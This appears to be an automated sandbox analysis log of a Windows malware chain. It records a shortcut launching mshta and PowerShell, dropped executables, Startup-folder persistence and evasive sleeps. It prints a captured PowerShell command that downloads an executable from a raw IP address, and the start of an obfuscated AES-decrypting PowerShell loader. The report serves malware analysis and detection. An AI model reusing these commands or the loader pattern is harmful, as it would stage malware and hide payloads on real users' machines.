Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: R4qP4YM0QX.lnk LNK file: ..\..\..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe
Source: Binary string: dvdplay.pdb source: mshta.exe

Data Obfuscation

Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('[hex-encoded data removed]');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656D47634 LoadLibraryA,GetProcAddress,19_2_00007FF656D47634
Source: FILEANH[1].4.dr Static PE information: real checksum: 0x5f0d should be: 0x20b35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD32C02365 push eax; iretd 8_2_00007FFD32C0237D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD32C000BD pushad ; iretd 8_2_00007FFD32C000C1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656CE78FD push rdi; ret 19_2_00007FF656CE7904
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656CE7399 push rdi; ret 19_2_00007FF656CE73A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_00007FFD32BE00BD pushad ; iretd 28_2_00007FFD32BE00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_00007FFD32CB06E5 push es; retf 28_2_00007FFD32CB06F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_00007FFD32CB0635 push es; retf 28_2_00007FFD32CB0642
Source: C:\Users\Public\Guard.exe Code function: 30_2_00378B75 push ecx; ret 30_2_00378B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 35_2_00B08B75 push ecx; ret 35_2_00B08B88

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\Public\Guard.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FILEANH[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656CD4514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_00007FF656CD4514
Source: C:\Users\Public\Guard.exe Code function: 30_2_003D59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,30_2_003D59B3
Source: C:\Users\Public\Guard.exe Code function: 30_2_00365EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,30_2_00365EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 35_2_00B659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,35_2_00B659B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 35_2_00AF5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,35_2_00AF5EDA
Source: C:\Users\Public\Guard.exeCode function: 30_2_003733B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,30_2_003733B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2170
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6136
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3615
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2685
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FILEANH[1]
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_30-99595
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeAPI coverage: 3.6 %
Source: C:\Users\Public\Guard.exeAPI coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2056Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 5633 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8632Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 2078 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8712Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2168Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3328Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00007FF656D2C7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF656D2B7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D371F4 FindFirstFileW,FindClose,19_2_00007FF656D371F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D372A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00007FF656D372A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF656D2BC70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00007FF656D3A874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D36428 FindFirstFileW,FindNextFileW,FindClose,19_2_00007FF656D36428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF656D3A350
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF656D3A4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF2F50 FindFirstFileExW,19_2_00007FF656CF2F50
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,30_2_003B4005
Source: C:\Users\Public\Guard.exeCode function: 30_2_003B494A GetFileAttributesW,FindFirstFileW,FindClose,30_2_003B494A
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,30_2_003BC2FF
Source: C:\Users\Public\Guard.exeCode function: 30_2_003BCD14 FindFirstFileW,FindClose,30_2_003BCD14
